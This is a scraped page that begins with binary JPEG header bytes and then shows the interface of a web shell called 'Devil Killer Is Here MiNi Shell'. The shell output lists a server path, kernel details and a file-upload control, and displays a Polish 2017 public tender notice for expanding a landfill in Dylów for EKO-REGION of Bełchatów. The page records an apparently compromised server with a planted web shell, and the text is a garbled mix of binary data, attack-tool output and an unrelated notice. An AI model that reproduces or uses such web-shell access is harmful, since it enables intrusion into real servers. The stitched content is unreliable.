JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170405/59640-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.eko-region.pl' target='_blank'>http://www.eko-region.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 59640 - 2017
              z dnia 2017-04-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bełchatów: rozbudowa II kwatery oraz budowa podkwater IIa i IIb Dylów/2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>EKO-REGION Sp. z o.o. Bełchatów, krajowy numer identyfikacyjny
              59076538100000, ul.
              ul. Bawełniana 
              18,
              97400  
              Bełchatów, woj.
              łódzkie, państwo
              Polska, tel.
              044 6330815, 6330819, e-mail
              zamowieniapubliczne@eko-region.pl, faks
              446 330 819.
              <br />
              Adres strony internetowej (URL): www.eko-region.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Spółka z o. o. </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.eko-region.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.eko-region.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę w formie pisemnej należy złożyć osobiście lub za pomocą operatora pocztowego lub za pośrednictwem kuriera.<br />
                Adres:
                <br />ul. Bawełniana 18,97-40 Bełchatów, sekretariat 1 piętro</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>rozbudowa II kwatery oraz budowa podkwater IIa i IIb Dylów/2017<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie przez Wykonawcę rozbudowy kwatery II poprzez podniesienie jej rzędnych składowania oraz budowy podkwater IIa i IIb wraz z niezbędną infrastrukturą na terenie Zakładu Gospodarowania Odpadami w Dylowie A gm. Pajęczno, zgodnie z:
1)umową,
2)ofertą Wykonawcy wraz z kosztorysami ofertowymi sporządzonymi metodą kalkulacji szczegółowej,
3)opisem przedmiotu zamówienia, który stanowi załącznik do umowy,
4)dokumentami wymienionymi w § 1 ust. 2 umowy, w tym m.in. w dokumentacji projektowej, kosztorysach ślepych oraz specyfikacjach technicznych wykonania i odbioru robót.

INNE POSTANOWIENIA
1.Jeżeli w dokumentacji projektowej, kosztorysach lub specyfikacjach technicznych wykonania i odbioru robót zostały podane nazwy własne, nazwy producenta czy pochodzenie materiałów czy urządzeń służących do zrealizowania przedmiotu umowy, należy przyjąć, że Zamawiający dodaje w tych miejscach słowa lub równoważne.
Zastosowanie materiałów i urządzeń równoważnych pod względem parametrów technicznych, funkcjonalnych, użytkowych i jakościowych jest możliwe przez Wykonawcę, jeśli przewidziane do zastosowania urządzenia i materiały nie będą gorsze od tych określonych w dokumentacji projektowej, kosztorysach lub specyfikacjach technicznych wykonania i odbioru robót.
Jeśli wykonawca zaoferuje zastosowanie rozwiązań równoważnych, w myśl art. 30 ust. 5 ustawy Pzp zobowiązany jest do wykazania, że proponowane materiały i urządzenia równoważne spełniać będą wymogi Zamawiającego, w szczególności przez dołączenie do oferty danych dotyczących parametrów techniczno  wytrzymałościowych, szczegółowych rysunków technicznych, atestów, aprobat, deklaracji zgodności, kart katalogowych rozwiązań zamiennych. Dokumenty te muszą jednoznacznie potwierdzić, że zaproponowane rozwiązania będą równoważne do wskazanych przez Zamawiającego. Rozwiązania równoważne zostaną poddane ocenie przez Zamawiającego i w przypadku stwierdzenia braku równoważności, oferta Wykonawcy zostanie odrzucona. 
2.Zgodnie z art. 29 ust. 3a ustawy Pzp Zamawiający wymaga, by wykonawca zatrudnił na podstawie umowy o pracę osoby wykonujące czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2016r. poz.1666 z późn. zm.):
2.1 Wykonawca w terminie do 7 dni roboczych od dnia pisemnego wezwania Zamawiającego zobowiązany jest do przedstawienia Zamawiającemu wykazu pracowników oraz dokumentów potwierdzających sposób ich zatrudnienia  poświadczona za zgodność z oryginałem kopia umów o pracę oraz poświadczona za zgodność z oryginałem kopia zaświadczeń o przeszkoleniu BHP, 
w zakresie wymaganym przez obowiązujące przepisy prawa. Poświadczone za zgodność 
z oryginałem kopie umów powinny zostać przedstawione w taki sposób, aby była zapewniona ochrona danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r.
o ochronie danych osobowych (w szczególności bez adresów, nr PESEL pracowników, natomiast z datą zawarcia umowy, imieniem i nazwiskiem pracownika, rodzajem umowy o pracę i wymiarem etatu).
2.2Zamawiający ma prawo w każdym czasie do weryfikacji pracowników realizujących czynności 
w ramach przedmiotu umowy pod kątem ich zatrudnienia przez Wykonawcę na podstawie umowy o pracę i posiadanych szkoleń BHP.
2.3Obowiązki wymienione w pkt.2 dotyczą również podwykonawców. Wykonawca winny jest w umowie z Podwykonawcą zobowiązać go do wypełniania powyższych obowiązków poprzez przedkładanie poświadczonych za zgodność z oryginałem kopii umów o pracę oraz poświadczonych za zgodność z oryginałem kopii zaświadczeń o przeszkoleniu BHP osób realizujących czynności w ramach przedmiotu umowy. Poświadczone za zgodność z oryginałem kopie umów powinny zostać przedstawione w taki sposób, aby była zapewniona ochrona danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (w szczególności bez adresów, nr PESEL pracowników, natomiast z datą zawarcia umowy, imieniem i nazwiskiem pracownika, rodzajem umowy o pracę i wymiarem etatu).
3.	Wykonawca przed złożeniem oferty ma możliwość dokonania wizji lokalnej terenu wykonania przedmiotu zamówienia, by prawidłowo przygotować i złożyć ofertę.
<br /><br /><b>II.5) Główny kod CPV: </b>45222110-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający dopuszcza możliwość udzielenia zamówień  z wolnej ręki na podstawie art. 67 ust. 1 pkt. 6. ustawy Pzp. W wysokości do 50% wartości zamówienia podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 7<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w tym zakresie. Zamawiający oceni, czy wykonawca spełnia warunki, o których mowa w art. 22 ust.1 ustawy Pzp na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże:
-Dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę minimum 5 000 000,00 zł netto;
-Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, na kwotę min.: 5 000 000,00 zł;
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                C.	Zdolność techniczna lub zawodowa
Doświadczenie:
1.	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
 w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania 
i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy roboty budowlane zostały wykonane należycie, w szczególności o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wykonawca zobowiązany jest do przedstawienia:  
1)	trzech robót budowlanych polegających na wybudowaniu składowiska odpadów innych niż niebezpieczne i obojętne o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty budowlanej.
2)	jednej roboty budowlanej, której przedmiotem była budowa, rozbudowa lub przebudowa obiektu gospodarki odpadami (łącznie z wykonaniem infrastruktury towarzyszącej).
3)	jednej roboty budowlanej, której przedmiotem była budowa, rozbudowa lub przebudowa składowiska odpadów innych niż niebezpieczne i obojętne (łącznie 
z wykonaniem infrastruktury towarzyszącej), obejmującego m.in. wykonanie wielowarstwowej izolacji podłoża (warstwa mineralna i syntetyczna), w tym lica skarpy ukształtowanej z istniejącego, przyległego złoża odpadów, o minimalnej wysokości bezwzględnej 8 m i powierzchni minimum 1000 m2.
Uwagi: W wykazie robót Wykonawca zobowiązany jest podać pięć różnych robót budowlanych.
Wzór wykazu robót budowlanych stanowi załącznik do SIWZ.

Osoby skierowane przez Wykonawcę do realizacji zamówienia:
1.	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakres wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami. Wykonawca zobowiązany jest do przedstawienia następującego wykazu dla osób, które będą realizowały przedmiotowe zadanie:
1)	Kierownik budowy:
	posiadający uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
	posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik budowy w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
	posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
2)	Kierownik robót drogowych:
	posiadający uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
	posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych
 w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
	posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
3)	Kierownik robót sieciowych:
	posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
	posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
	posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
4)	Kierownik robót elektrycznych:
	posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
	posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
	posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).

Wykonawca ma obowiązek zapewnić realizację zamówienia przez wskazane w ofercie osoby 
(w Wykazie osób). W przypadku zaistnienia, w toku realizacji przedmiotu zamówienia, okoliczności wymuszających konieczność zmiany którejkolwiek z osób wskazanych w Wykazie, Wykonawca ma obowiązek zapewnić na każde stanowisko osobę posiadającą co najmniej takie same kompetencje, wykształcenie i doświadczenie jak osoba wskazana na to stanowisko w ofercie. Zmiana osób  wskazanych w ofercie dokonywana jest na zasadach określonych w umowie. 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,
2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu  potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem  podatkowym w sprawie spłat  tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3.Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
4.Informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
5.Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekazuje zamawiającemu oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji postępowania o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 6 do SIWZ.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
 w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania 
